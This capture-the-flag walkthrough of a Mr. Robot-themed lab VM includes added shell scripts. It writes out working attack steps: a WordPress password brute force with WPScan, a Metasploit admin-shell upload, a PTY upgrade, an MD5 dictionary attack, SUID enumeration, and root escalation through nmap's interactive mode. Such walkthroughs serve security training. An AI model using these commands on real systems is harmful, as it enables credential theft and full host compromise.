Before we begin we should watch the Mr. Robot series... just kidding, but I have seen it, so I knew the character names to try as usernames on this host.
Let's start by scanning the host with nmap (all TCP ports, with version detection and default scripts):
nmap -A -T4 -p- -v 192.168.1.20

Dirb gave us a lot of results:

What is interesting is the robots.txt file, which points to two files:

Opening key-1-of-3.txt gives us the first key, a 32-character hex string that looks like an MD5 hash: 073403c8a58a1f80d943455fb30724b9

The other file, fsocity.dic, is a dictionary file containing a big password list.

Nikto shows that the host is running WordPress.


So now we can use WPScan with the word list we found. I tried mrrobot as the username first but nothing came up; then I tried elliot as the username and it came back with a password. fsocity.dic is large and mostly made up of repeated lines, so reduce it to unique entries first; this makes the brute force much shorter:
sort fsocity.dic | uniq > pass.txt
wpscan --url http://192.168.1.20 -P /root/Downloads/pass.txt -U elliot -t 100

Now let's try logging in to the WordPress admin page with these credentials:

Now that we have admin credentials we can use Metasploit to upload a shell to the host:
We are going to use the exploit module unix/webapp/wp_admin_shell_upload, which logs in with the credentials and uploads a plugin containing the payload.
Set WPCHECK to false or it won't work (I had to google it to figure this out): the option makes the module verify that the target is running WordPress before exploiting, and that check fails on this host even though WordPress is there.


Viewing password.raw-md5 we get an MD5 hash. MD5 cannot be decoded, but looking the hash up (a wordlist attack or an online hash database) gives us the plaintext: abcdefghijklmnopqrstuvwxyz
The shell we get from Metasploit is not a real terminal, and su refuses to run without one, so first upgrade it to a PTY with python -c "import pty; pty.spawn('/bin/bash')". Then we run su - robot to switch to the robot account, using the password we just cracked.
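The two list-and-hash steps above (shrinking fsocity.dic before the WPScan run, and recovering the plaintext behind password.raw-md5) can be done with nothing but coreutils. The script below is an added example and is not part of the original walkthrough or the VM: the wordlist it builds is constructed inline, and the hash it cracks is the RFC 1321 test vector for "abcdefghijklmnopqrstuvwxyz" (c3fcd3d76192e4007dfb496cca67e13b), which is the only hash value the page's plaintext implies. The raw-md5 format is unsalted md5(password) in lower-case hex, so the candidate is hashed exactly that way; printf is used instead of echo so no trailing newline gets hashed.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): dedupe a wordlist and
# run a raw-MD5 dictionary attack using only POSIX sh + coreutils.

# Collapse duplicate lines in a wordlist. fsocity.dic is mostly repeats, so
# this shrinks it a lot before it is handed to wpscan.
uniq_wordlist() {
    # $1 = input wordlist, $2 = output file
    sort "$1" | uniq > "$2"
}

# Hash one candidate the way the raw-md5 format expects: md5(password),
# no salt, lower-case hex. printf avoids the newline that echo would add.
md5_of() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# Try every line of a wordlist against a raw-md5 hash. Prints the matching
# word and returns 0, or prints nothing and returns 1 if nothing matched.
crack_md5() {
    # $1 = target hash (32 hex chars, any case), $2 = wordlist file
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r word || [ -n "$word" ]; do
        if [ "$(md5_of "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Demo on a constructed wordlist (with duplicates, like fsocity.dic) so the
# functions can be exercised offline. Hypothetical words, not box data.
demo() {
    tmp=$(mktemp -d)
    printf '%s\n' password password letmein abcdefghijklmnopqrstuvwxyz letmein elliot > "$tmp/raw.dic"
    uniq_wordlist "$tmp/raw.dic" "$tmp/pass.txt"
    echo "unique candidates: $(wc -l < "$tmp/pass.txt")"
    # RFC 1321 test vector: md5("abcdefghijklmnopqrstuvwxyz")
    crack_md5 c3fcd3d76192e4007dfb496cca67e13b "$tmp/pass.txt"
    rm -rf "$tmp"
}

demo
```

On the real box the same two functions would be run as uniq_wordlist fsocity.dic pass.txt and crack_md5 "$(cut -d: -f2 password.raw-md5)" pass.txt, assuming the file holds a single user:hash line; adjust the cut if the file format differs. sort -u would do the same job as sort | uniq in one step.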

As robot we can now view the second file, key-2-of-3.txt:

This gives us the second key, another hash-like string. It is only a flag, not something we can use for further access.
Privilege escalation took some time, until I found that nmap is installed on the system with the SUID bit set (owned by root), and this old build still supports interactive mode, which newer nmap releases have removed: nmap --interactive
Then, at the nmap> prompt, simply !sh spawns a shell that keeps nmap's root privileges, and we can read the last key.
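The escalation above hinges on finding a root-owned SUID binary; that enumeration is what takes the time, and it is worth scripting. The functions below are an added example, not part of the original walkthrough: find_suid lists every setuid file under a tree and find_suid_root narrows it to root-owned ones, which are the only ones that give euid 0. The nmap steps are left as comments because they only make sense on a box where nmap is SUID root and old enough to have interactive mode; nothing in the example assumes a particular nmap version.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): SUID enumeration, the
# step that turns up the nmap binary used for the root shell.

# List files under a directory tree with the setuid bit set.
# On a target run it as: find_suid /   (unreadable directories are ignored).
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# Same, restricted to root-owned binaries: those are the interesting ones,
# since any shell they spawn will run with euid 0.
find_suid_root() {
    find "$1" -type f -perm -4000 -user root 2>/dev/null
}

# Constructed, offline demo: create a throwaway tree with one setuid file
# and show that only that file is reported (hypothetical names).
demo() {
    tmp=$(mktemp -d)
    : > "$tmp/plain"
    : > "$tmp/suidbin"
    chmod u+s "$tmp/suidbin"
    echo "setuid files under $tmp:"
    find_suid "$tmp"
    rm -rf "$tmp"
}

demo

# Once a root-owned SUID nmap shows up in find_suid_root / output, the
# escalation from the walkthrough is (typed interactively, not run here):
#   nmap --interactive      # only old nmap builds still offer this mode
#   nmap> !sh               # runs a shell from inside the SUID process
#   id                      # expect euid=0(root) in the output
```

If id shows uid=robot but euid=0(root), that is still enough to read root's files; some shells drop the effective uid on startup, in which case invoking the shell with its privileged mode (bash -p) keeps it.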
